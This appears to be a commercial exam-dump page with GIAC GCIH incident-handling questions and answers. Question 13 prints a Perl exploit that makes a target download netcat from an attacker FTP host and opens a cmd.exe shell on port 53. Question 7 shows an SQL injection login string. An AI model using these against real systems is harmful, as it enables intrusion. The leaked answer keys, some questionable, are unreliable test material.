GCIH | The Up To Date Guide To GCIH Exam

Certleader offers a free demo for the GCIH exam. "GIAC Certified Incident Handler", also known as the GCIH exam, is a GIAC certification. This set of posts, Passing the GIAC GCIH exam, will help you answer those questions. The GCIH Questions & Answers cover all the knowledge points of the real exam. 100% real GIAC GCIH exam questions, revised by experts!

We also have free GCIH dump questions for you:

NEW QUESTION 1
Adam, a malicious hacker, purposely sends fragmented ICMP packets to a remote target. The total size of this ICMP packet, once reassembled, is over 65,536 bytes. On the basis of the above information, which of the following types of attack is Adam attempting to perform?

  • A. Fraggle attack
  • B. Ping of death attack
  • C. SYN Flood attack
  • D. Land attack

Answer: B

NEW QUESTION 2
Which of the following types of scan does not open a full TCP connection?

  • A. FIN scan
  • B. ACK scan
  • C. Stealth scan
  • D. Idle scan

Answer: C

NEW QUESTION 3
Which of the following applications automatically calculates cryptographic hashes of all key system files that are to be monitored for modifications?

  • A. Tripwire
  • B. TCPView
  • C. PrcView
  • D. Inzider

Answer: A

NEW QUESTION 4
An Active Attack is a type of steganography attack in which the attacker changes the carrier during the communication process. Which of the following techniques is used for smoothing the transition and controlling contrast on the hard edges, where there is significant color transition?

  • A. Soften
  • B. Rotate
  • C. Sharpen
  • D. Blur

Answer: D

NEW QUESTION 5
You discover that all available network bandwidth is being consumed by some unknown service. You then find that UDP packets are being used to connect the echo service on one machine to the chargen service on another machine. What kind of attack is this?

  • A. Smurf
  • B. Denial of Service
  • C. Evil Twin
  • D. Virus

Answer: B

NEW QUESTION 6
In which of the following scanning methods do Windows operating systems send only RST packets irrespective of whether the port is open or closed?

  • A. TCP FIN
  • B. FTP bounce
  • C. XMAS
  • D. TCP SYN

Answer: A

NEW QUESTION 7
John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as the username and successfully logs on to the user page of the Web site. Now, John asks we-are-secure Inc. to improve the login page PHP script. Which of the following suggestions can John give to protect the we-are-secure Website login page from SQL injection attacks?

  • A. Use the escapeshellarg() function
  • B. Use the session_regenerate_id() function
  • C. Use the mysql_real_escape_string() function for escaping input
  • D. Use the escapeshellcmd() function

Answer: C

NEW QUESTION 8
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

  • A. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • C. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"
  • D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Answer: C

NEW QUESTION 9
You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are working as a root user on the Linux operating system. Your company is facing an IP spoofing attack.
Which of the following tools will you use to get an alert saying that an upcoming IP packet is being spoofed?

  • A. Despoof
  • B. Dsniff
  • C. ethereal
  • D. Neotrace

Answer: A

NEW QUESTION 10
TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during standard layer 4 network communications. The combination of parameters may then be used to infer the remote operating system (OS fingerprinting), or incorporated into a device fingerprint.
Which of the following Nmap switches can be used to perform TCP/IP stack fingerprinting?

  • A. nmap -sS
  • B. nmap -sU -p
  • C. nmap -O -p
  • D. nmap -sT

Answer: C

NEW QUESTION 11
Which of the following attacks fall under the category of layer 2 Denial-of-Service attacks?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Spoofing attack
  • B. SYN flood attack
  • C. Password cracking
  • D. RF jamming attack

Answer: AB

NEW QUESTION 12
Which of the following attacking methods allows the bypassing of access control lists on servers or routers, either hiding a computer on a network or allowing it to impersonate another computer by changing the Media Access Control address?

  • A. IP address spoofing
  • B. VLAN hopping
  • C. ARP spoofing
  • D. MAC spoofing

Answer: D

NEW QUESTION 13
Adam, a malicious hacker, runs the exploit given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=<STDIN>;
print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);
Which of the following is the expected result of the above exploit?

  • A. Creates a share called "sasfile" on the target system
  • B. Creates an FTP server with write permissions enabled
  • C. Opens up a SMTP server that requires no username or password
  • D. Opens up a telnet listener that requires no username or password

Answer: D

NEW QUESTION 14
Which of the following ensures that the incident response team's investigation process does not break any laws during the response to an incident?

  • A. Information Security representative
  • B. Lead Investigator
  • C. Legal representative
  • D. Human Resource

Answer: C

NEW QUESTION 15
Firekiller 2000 is an example of a __________.

  • A. Security software disabler Trojan
  • B. DoS attack Trojan
  • C. Data sending Trojan
  • D. Remote access Trojan

Answer: A

NEW QUESTION 16
Brutus is a password cracking tool that can be used to crack the following authentication types:
  • HTTP (Basic Authentication)
  • HTTP (HTML Form/CGI)
  • POP3 (Post Office Protocol v3)
  • FTP (File Transfer Protocol)
  • SMB (Server Message Block)
  • Telnet
Which of the following attacks can be performed by Brutus for password cracking?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Hybrid attack
  • B. Replay attack
  • C. Dictionary attack
  • D. Brute force attack
  • E. Man-in-the-middle attack

Answer: ACD

NEW QUESTION 17
Which of the following nmap command parameters is used for TCP SYN port scanning?

  • A. -sF
  • B. -sU
  • C. -sX
  • D. -sS

Answer: D

NEW QUESTION 18
......

P.S. Easily pass the GCIH exam with the 328 Q&As Dumps-files.com dumps & PDF version. Welcome to download the newest Dumps-files.com GCIH dumps: https://www.dumps-files.com/files/GCIH/ (328 New Questions)